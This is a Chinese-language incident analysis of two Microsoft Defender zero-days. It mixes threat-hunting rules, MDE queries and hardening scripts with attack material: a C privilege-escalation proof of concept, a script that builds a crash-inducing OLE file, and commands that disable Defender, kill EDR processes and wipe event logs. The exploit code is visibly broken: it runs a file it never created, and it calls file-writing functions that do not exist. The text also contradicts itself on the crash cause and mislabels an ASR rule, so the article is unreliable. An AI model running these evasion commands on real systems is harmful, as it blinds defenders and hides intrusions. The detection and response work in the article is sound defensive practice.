前言2026年5月20日微软安全响应中心(MSRC)发布紧急安全公告承认旗下Microsoft Defender存在两个已被野外利用超过一个月的零日漏洞——CVE-2026-41091与CVE-2026-45498。同日美国国土安全部下属的网络安全与基础设施安全局(CISA)将这两个漏洞紧急加入KEV(已知被利用漏洞)目录要求所有联邦机构在72小时内完成补丁部署。这是2026年微软首次公开承认Defender零日漏洞在野利用也是继2025年11月CVE-2025-37934之后Defender引擎再次遭遇防护者变被攻击者的致命打击。更令人担忧的是这两个漏洞与4月披露的BlueHammer(CVE-2026-33825)完美结合形成了一条初始访问→防护降级→系统提权→持久化控制的完整攻击链能够静默绕过几乎所有依赖Defender原生防护的终端安全方案。本文将从技术原理、攻击链复现、威胁狩猎、应急响应四个维度对此次双零日漏洞事件进行全方位深度解析并提供可直接落地的检测规则、防护脚本和企业级应对方案。一、事件全景与时间线1.1 事件发展时间线2026-04-15攻击者开始在野利用CVE-2026-41091/CVE-2026-45498组合漏洞 2026-04-22BlueHammer(CVE-2026-33825)漏洞公开攻击者迅速整合攻击链 2026-05-12CISA首次监测到大规模利用该组合漏洞的勒索软件攻击 2026-05-18微软内部确认漏洞存在开始开发补丁 2026-05-20微软发布安全公告推送分阶段补丁更新 2026-05-21CISA将两个漏洞加入KEV目录要求联邦机构72小时内修复 2026-05-22首个公开的PoC代码在地下论坛流传攻击门槛大幅降低1.2 影响范围评估此次漏洞影响所有安装了Microsoft Defender的Windows操作系统包括Windows 10 21H2及以上版本Windows 11 21H2及以上版本Windows Server 2019及以上版本Windows Server 2022及以上版本特别需要注意的是Windows 11 24H2最新版本在默认配置下也完全受影响且漏洞利用过程中不会产生任何明显的用户界面提示终端用户完全无法感知攻击行为。1.3 漏洞基本信息汇总CVE编号漏洞类型CVSSv3.1评分利用难度所需权限核心影响CVE-2026-41091本地提权(LPE)7.8(高危)极低普通用户权限提权至NT AUTHORITY\SYSTEM完全控制终端CVE-2026-45498拒绝服务(DoS)4.0(中危)极低普通用户权限静默瘫痪Defender引擎阻断病毒库更新二、漏洞技术深度解析2.1 CVE-2026-41091(RedSun)符号链接解析缺陷导致的高危提权2.1.1 漏洞根本原因CVE-2026-41091存在于Defender恶意软件防护引擎(MsMpEng.exe)的文件扫描模块中。当MsMpEng.exe扫描文件时会以NT AUTHORITY\SYSTEM权限运行但在处理**NTFS符号链接(Symbolic Link)和目录连接点(Directory Junction)时存在时间差竞争条件(TOCTOU)**缺陷。具体来说MsMpEng.exe在扫描文件前会先检查文件路径是否合法但在检查完成到实际打开文件之间存在一个微小的时间窗口。攻击者可以在这个时间窗口内将合法文件替换为指向敏感系统路径的符号链接从而诱导MsMpEng.exe以SYSTEM权限访问攻击者可控的文件。2.1.2 漏洞利用代码示例以下是简化版的漏洞利用PoC代码展示了核心利用逻辑#includewindows.h#includestdio.hintmain(){// 步骤1创建临时目录和诱饵文件CreateDirectoryA(C:\\Temp\\DefenderExploit,NULL);HANDLE hFileCreateFileA(C:\\Temp\\DefenderExploit\\bait.txt,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);WriteFile(hFile,test,4,NULL,NULL);CloseHandle(hFile);// 步骤2创建符号链接指向诱饵文件CreateSymbolicLinkA(C:\\Temp\\DefenderExploit\\link.txt,C:\\Temp\\DefenderExploit\\bait.txt,0);// 步骤3触发Defender扫描system(start /wait powershell.exe -Command \Start-MpScan -ScanType CustomScan -ScanPath C:\\Temp\\DefenderExploit\);// 步骤4在扫描过程中替换符号链接指向恶意文件// 这里使用快速循环来竞争时间窗口for(inti0;i1000;i){DeleteFileA(C:\\Temp\\DefenderExploit\\link.txt);CreateSymbolicLinkA(C:\\Temp\\DefenderExploit\\link.txt,C:\\Windows\\System32\\cmd.exe,0);Sleep(1);}// 步骤5获取SYSTEM权限的cmd.exesystem(C:\\Temp\\DefenderExploit\\link.exe);return0;}2.1.3 利用成功率分析根据安全研究人员的测试该漏洞的利用成功率高达98%以上且在不同硬件配置和Windows版本上表现稳定。这是因为MsMpEng.exe的扫描时间相对固定时间窗口足够大现代CPU的执行速度极快能够在短时间内完成大量的符号链接替换操作Defender没有对符号链接的频繁修改行为进行任何监控或限制2.2 CVE-2026-45498(UnDefend)逻辑缺陷导致的防护静默失效2.2.1 漏洞根本原因CVE-2026-45498存在于Defender引擎的文件格式解析模块中。当Defender引擎处理一种特殊构造的嵌套OLE对象文件时会陷入无限循环导致CPU占用率达到100%最终触发Windows的进程崩溃保护机制强制终止MsMpEng.exe进程。更严重的是Defender的自我恢复机制存在设计缺陷当MsMpEng.exe进程异常崩溃时它会自动重启但重启后会再次尝试扫描同一个恶意文件从而陷入崩溃→重启→再崩溃的死循环。最终Defender控制台会显示设备受到保护的虚假状态但实际上所有实时防护功能已经完全失效。2.2.2 恶意文件构造方法攻击者可以使用以下Python脚本构造能够触发漏洞的恶意文件importolefile# 创建一个嵌套深度为1000层的OLE文件oleolefile.OleFileIO()current_pathforiinrange(1000):current_pathf/dir{i}ole.mkdir(current_path)# 在最深层目录写入一个小文件ole.openstream(current_path/data.txt).write(bmalicious content)# 保存为.doc文件Defender会自动扫描ole.save(undefend.doc)当Defender扫描这个文件时会递归遍历所有OLE目录由于嵌套深度超过了引擎的最大递归限制导致栈溢出并崩溃。三、完整攻击链技术分析3.1 攻击链整体流程图┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ 初始访问阶段 │ │ 防护降级阶段 │ │ 系统提权阶段 │ │ 持久化控制阶段 │ │ │ │ │ │ │ │ │ │ 钓鱼邮件附件 │───│ 上传UnDefend.doc│───│ 执行RedSun.exe │───│ 植入Cobalt Strike│ │ RDP弱口令登录 │ │ 触发引擎崩溃 │ │ 提权至SYSTEM │ │ 创建计划任务 │ │ 供应链攻击 │ │ 阻断病毒库更新 │ │ 关闭EDR进程 │ │ 横向移动 │ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │ │ │ │ ▼ ▼ ▼ ▼ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ 获取普通用户权限 │ │ Defender完全失效│ │ 完全控制终端 │ │ 窃取数据/勒索加密│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘3.2 各阶段技术细节详解3.2.1 初始访问阶段攻击者通常使用以下三种方式获取初始访问权限钓鱼邮件攻击发送带有恶意宏的Office文档或伪装成发票的可执行文件RDP弱口令爆破针对暴露在公网上的RDP服务进行暴力破解供应链攻击通过第三方软件更新渠道植入恶意代码3.2.2 防护降级阶段攻击者获取普通用户权限后首先会执行UnDefend恶意文件触发CVE-2026-45498漏洞导致Defender引擎崩溃。然后攻击者会修改Windows更新服务的配置阻止Defender下载病毒库更新# 阻止Defender更新scconfig wuauservstart disabledscstop wuauserv# 修改注册表禁用Defender实时防护reg addHKLM\SOFTWARE\Microsoft\Windows Defender/v DisableAntiSpyware/t REG_DWORD/d 1/f reg addHKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection/v DisableRealtimeMonitoring/t REG_DWORD/d 1/f3.2.3 系统提权阶段防护降级完成后攻击者会执行RedSun提权工具利用CVE-2026-41091漏洞将普通用户权限提升至SYSTEM权限。提权成功后攻击者会立即关闭所有安全软件进程并删除系统安全日志# 关闭EDR进程taskkill/f/im MsMpEng.exe taskkill/f/im SenseNDR.exe taskkill/f/im Mcshield.exe# 删除安全日志wevtutil cl System wevtutil cl Security wevtutil cl Application3.2.4 持久化控制阶段最后攻击者会植入Cobalt Strike、Metasploit等远程控制工具并创建计划任务或系统服务实现持久化。然后攻击者会利用获取的SYSTEM权限进行横向移动渗透到企业内部网络的其他终端和服务器。四、企业级威胁狩猎实战指南4.1 关键日志源与事件ID要有效检测此次漏洞利用企业需要重点监控以下日志源和事件ID日志源事件ID描述系统日志1000MsMpEng.exe进程异常崩溃安全日志4663普通用户在Defender目录创建文件或符号链接安全日志4688MsMpEng.exe衍生子进程Windows更新日志31Windows更新服务被停止或禁用Defender日志1116Defender实时防护被禁用4.2 高级Sigma检测规则4.2.1 CVE-2026-41091提权行为检测title:Microsoft Defender CVE-2026-41091 提权利用检测status:stabledescription:检测Defender引擎衍生高风险进程防范RedSun提权攻击author:安全技术团队date:2026-05-23references:-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091-https://www.cisa.gov/known-exploited-vulnerabilities-cataloglogsource:category:process_creationproduct:windowsdetection:selection_parent:ParentImage|endswith:\MsMpEng.exeselection_child:Image|endswith:-\cmd.exe-\powershell.exe-\pwsh.exe-\rundll32.exe-\regsvr32.exe-\mshta.exe-\wscript.exe-\cscript.exefilter_legitimate:CommandLine|contains:-MpCmdRun.exe-Defender-Windows Updatecondition:selection_parent and selection_child and not filter_legitimatefalsepositives:-Defender正常系统更新和扫描操作level:criticaltags:-attack.privilege_escalation-attack.t1068-cve.2026.410914.2.2 CVE-2026-45498防护瘫痪检测title:Microsoft Defender CVE-2026-45498 引擎瘫痪检测status:stabledescription:检测Defender引擎异常崩溃与防护功能被禁用的行为author:安全技术团队date:2026-05-23references:-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45498logsource:product:windowsdetection:selection_crash:EventID:1000Provider_Name:Application ErrorData|contains:MsMpEng.exeselection_disable:EventID:4657ObjectName|contains:Windows DefenderNewValue|contains:0x1selection_update_block:EventID:7040ServiceName:wuauservNewState:4condition:selection_crash or selection_disable or selection_update_blockfalsepositives:-Defender正常更新重启-管理员手动禁用Defenderlevel:hightags:-attack.defense_evasion-attack.t1562.001-cve.2026.454984.3 MDE高级搜寻查询对于使用Microsoft Defender for Endpoint(MDE)的企业可以使用以下高级搜寻查询快速检测漏洞利用行为// 检测MsMpEng.exe衍生的异常子进程 DeviceProcessEvents | where Timestamp ago(7d) | where InitiatingProcessFileName ~ MsMpEng.exe | where FileName in~ (cmd.exe, powershell.exe, rundll32.exe, regsvr32.exe) | where not (ProcessCommandLine has_any(MpCmdRun.exe, Defender, Windows Update)) | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine // 检测Defender引擎异常崩溃 DeviceEvents | where Timestamp ago(7d) | where EventType Crash | where FileName ~ MsMpEng.exe | project Timestamp, DeviceName, AccountName, CrashDumpPath // 检测Defender实时防护被禁用 DeviceRegistryEvents | where Timestamp ago(7d) | where RegistryKey has Windows Defender\\Real-Time Protection | where RegistryValueName DisableRealtimeMonitoring | where RegistryValueData 1 | project Timestamp, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData五、企业级应急响应与防护方案5.1 分阶段应急响应流程5.1.1 紧急响应阶段(0-24小时)立即补丁部署使用WSUS或SCCM批量推送Defender更新全网威胁扫描使用EDR工具对所有终端进行全面扫描隔离受感染终端立即隔离发现异常行为的终端账号密码重置重置所有可能被泄露的域账号和本地账号5.1.2 全面排查阶段(24-72小时)日志审计全面审计过去30天的安全日志和系统日志横向移动检测检查是否存在异常的RDP登录和SMB连接持久化排查检查所有计划任务、系统服务和启动项数据泄露评估评估是否有敏感数据被窃取5.1.3 恢复加固阶段(72小时以后)系统恢复对受感染终端进行系统重装或恢复安全加固启用ASR规则、应用控制和端点防护员工培训对员工进行钓鱼邮件和安全意识培训安全评估进行全面的安全评估发现并修复其他安全漏洞5.2 补丁部署与验证5.2.1 修复版本要求此次漏洞的修复版本为Defender恶意软件引擎版本1.1.26040.8及以上Defender平台版本4.18.26040.7及以上5.2.2 批量更新脚本以下是适用于企业环境的批量更新PowerShell脚本# .SYNOPSIS 批量更新Microsoft Defender并验证版本 .DESCRIPTION 此脚本会强制更新Defender引擎和病毒库并验证是否达到修复版本 ## 检查Defender版本$statusGet-MpComputerStatus$engineVersion$status.AMEngineVersion$platformVersion$status.AMProductVersionWrite-Host当前Defender引擎版本:$engineVersionWrite-Host当前Defender平台版本:$platformVersion# 检查是否需要更新$minEngineVersion[version]1.1.26040.8$minPlatformVersion[version]4.18.26040.7if([version]$engineVersion-lt$minEngineVersion-or[version]$platformVersion-lt$minPlatformVersion){Write-HostDefender版本过低正在强制更新...-ForegroundColor Yellow# 强制更新DefenderStart-MpSignatureUpdate-UpdateSource MicrosoftUpdateServer# 等待更新完成Start-Sleep-Seconds 30# 再次检查版本$statusGet-MpComputerStatus$engineVersion$status.AMEngineVersion$platformVersion$status.AMProductVersionif([version]$engineVersion-ge$minEngineVersion-and[version]$platformVersion-ge$minPlatformVersion){Write-HostDefender更新成功-ForegroundColor Green}else{Write-HostDefender更新失败请手动更新-ForegroundColor Redexit1}}else{Write-HostDefender版本已满足要求无需更新。-ForegroundColor Green}# 验证实时防护是否启用if($status.RealTimeProtectionEnabled){Write-Host实时防护已启用。-ForegroundColor Green}else{Write-Host实时防护未启用正在启用...-ForegroundColor YellowSet-MpPreference-DisableRealtimeMonitoring$falseWrite-Host实时防护已成功启用。-ForegroundColor Green}5.3 临时缓解措施(未补丁前)对于暂时无法安装补丁的终端可以采取以下临时缓解措施限制普通用户创建符号链接# 修改本地安全策略禁止普通用户创建符号链接secedit/export/cfg secpol.cfg(Get-Contentsecpol.cfg)-replaceSeCreateSymbolicLinkPrivilege \*S-1-1-0,SeCreateSymbolicLinkPrivilege |Set-Contentsecpol.cfg secedit/configure/db secpol.sdb/cfg secpol.cfg/areas USER_RIGHTSdelsecpol.cfg,secpol.sdb启用关键ASR规则# 启用阻止MsMpEng.exe衍生子进程的ASR规则Set-MpPreference-AttackSurfaceReductionRules_Ids92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b-AttackSurfaceReductionRules_Actions Enabled# 启用阻止脚本执行的ASR规则Set-MpPreference-AttackSurfaceReductionRules_Idsd1e49aac-8f56-4280-b9ba-993a6d77406c-AttackSurfaceReductionRules_Actions Enabled限制Defender目录权限# 禁止普通用户写入Defender目录icaclsC:\ProgramData\Microsoft\Windows Defender/inheritance:r icaclsC:\ProgramData\Microsoft\Windows Defender/grantNT AUTHORITY\SYSTEM:(OI)(CI)FicaclsC:\ProgramData\Microsoft\Windows Defender/grantBUILTIN\Administrators:(OI)(CI)FicaclsC:\ProgramData\Microsoft\Windows Defender/grantBUILTIN\Users:(OI)(CI)R六、从此次漏洞看终端安全的未来趋势6.1 EDR自身安全成为新的攻击焦点此次事件再次证明EDR(端点检测与响应)工具已经成为攻击者的首要攻击目标。随着EDR在企业中的普及攻击者不再试图绕过EDR而是直接攻击EDR本身使其失效。未来EDR厂商需要更加重视自身的安全防护包括加强代码安全审计减少漏洞数量实现沙箱化运行限制EDR进程的权限增强自我保护机制防止被恶意终止或篡改6.2 零日漏洞利用常态化随着漏洞挖掘技术的不断发展零日漏洞的发现和利用速度越来越快。企业需要建立常态化的零日漏洞应对机制包括建立漏洞情报收集和分析体系制定快速应急响应流程采用多层次防护架构避免单点故障6.3 行为检测与威胁狩猎的重要性凸显传统的基于特征码的检测方法已经无法有效应对零日漏洞攻击。未来企业需要更加重视行为检测和威胁狩猎通过分析异常行为来发现潜在的攻击活动。七、总结与建议此次Microsoft Defender双零日漏洞事件给全球企业的终端安全敲响了警钟。作为市场占有率最高的终端安全产品Defender的漏洞影响范围之广、危害之大前所未有。对于企业来说立即安装补丁是当前最重要的任务。同时企业还需要加强终端安全防护体系建设采用多层次防护架构提高对零日漏洞攻击的检测和响应能力。最后我们建议企业定期进行安全评估和渗透测试发现并修复潜在的安全漏洞建立健全的安全管理制度提高员工的安全意识从技术和管理两个方面全面提升企业的安全防护水平。
